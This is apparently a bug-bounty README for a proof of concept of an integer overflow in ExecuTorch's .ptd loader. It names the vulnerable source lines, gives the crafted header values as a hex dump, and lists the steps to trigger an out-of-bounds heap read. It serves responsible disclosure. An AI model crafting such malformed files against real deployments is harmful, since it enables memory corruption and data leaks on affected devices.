File size: 4,218 Bytes
f3253b3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
---
license: mit
tags:
  - security-research
  - bug-bounty
  - huntr
  - executorch
---

# SECURITY RESEARCH POC -- ExecuTorch `.ptd` integer overflow

This repository contains a **proof-of-concept malicious `.ptd` payload** for a responsible-disclosure bug bounty submission filed at [huntr.com](https://huntr.com) under the Model File Formats program.

**The PoC demonstrates an integer-overflow primitive** in `FlatTensorDataMap::load()`:

- `extension/flat_tensor/flat_tensor_data_map.cpp:224` -- unchecked `u64 + u64 -> size_t` truncation on attacker-controlled header fields
- `extension/flat_tensor/flat_tensor_data_map.cpp:236` -- same primitive used as the LOAD LENGTH, never bounds-checked
- Sibling code in `runtime/executor/program.cpp:104-109` uses `c10::add_overflows` correctly -- proof the project knows the right pattern and **missed copies** in the extension

PR #19057 ("Fix overflows in et", Apr 24 2026, commit ec5e8e4) hardened the `get_named_data` path of the same file but did NOT touch lines 224/236. Static missed-copy with confirmed-attention bug-surface anchor.

## Files

| File | Purpose |
|---|---|
| `malicious.ptd` | 256-byte byte-exact PoC. Two header fields are crafted to wrap on `u64 + u64 -> size_t`. Inspect with `xxd malicious.ptd`. |
| `craft_malicious_ptd.py` | Static crafter -- reproduces `malicious.ptd` from scratch. No ExecuTorch build needed. |
| `verify_unpatched.py` | One-command reviewer-side verifier. Fetches the live `extension/flat_tensor/flat_tensor_data_map.cpp` from `pytorch/executorch` main HEAD and confirms 7 unguarded `u64+u64` sites still present alongside 1 correctly-guarded `c10::add_overflows`. Runs in <5 seconds. |

## Verification (no ExecuTorch build required)

```bash
pip install urllib3
python verify_unpatched.py
```

Expected output (verbatim):

```
[BUG CONFIRMED] The file uses c10::add_overflows correctly elsewhere
                (1 call sites) but has 7 unguarded u64+u64 additions
                on attacker-controlled header fields. This is the
                missed-copy of the Aug 2025 CVE-2025-30402/30404/30405
                remediation pattern, in a code path that PR #19057
                (Apr 24 2026) added overflow guards to OTHER parts of.
```

Inspect the malicious file:

```bash
xxd malicious.ptd | head -5
```

Shows the wraparound-mate header values:

```
00000000: 0000 0000 0000 0000 4648 3031 2800 0000  ........FH01(...
00000010: 4000 0000 0000 0000 00ff ffff ffff ffff  @...............
00000020: ffff ffff 0000 0000 4100 0000 0100 0000  ........A.......
```

(Note: bytes shown are little-endian; `flatbuffer_size = 0xFFFF_FFFF_FFFF_FF00` and `segment_data_size = 0x0000_0001_0000_0041`.)

## Runtime PoC (ExecuTorch build required)

To trigger the OOB read at runtime:

```bash
git clone https://github.com/pytorch/executorch.git
cd executorch && ./install_executorch.sh
# Build the runtime + ASan, then point any FlatTensorDataMap::load() consumer at this file.
```

Under ASan, the load produces a clean `heap-buffer-overflow` report. Without ASan, the result depends on the data loader:
- `BufferDataLoader` -> OOB read into adjacent heap allocations
- `MmapDataLoader` -> OOB read into adjacent VMA pages

On 32-bit ARM (ExecuTorch's primary deployment target -- mobile / embedded / Cortex-M), `size_t` is 32-bit and both header arithmetic sites overflow silently -- direct heap-corruption-grade primitive.

## Affected component

- **ExecuTorch** (`pytorch/executorch`) -- current `main` HEAD, post-commit `1c9c115`. Pre-patch.
- **File**: `extension/flat_tensor/flat_tensor_data_map.cpp` lines 224 and 236.
- **Same bug class also unhardened**: `runtime/executor/pte_data_map.cpp:57-60` (out of scope for this report).

## Disclosure status

This PoC is part of a responsible-disclosure submission filed via huntr's Model File Formats bug bounty program. After triage and remediation, this repository will be marked private or deleted.

## Disclaimer

This repository is intended for security research and responsible disclosure only. Do not use the techniques shown here on systems you do not own or have permission to test.

## Contact

Security researcher: **kais113** (amakais.sales@gmail.com)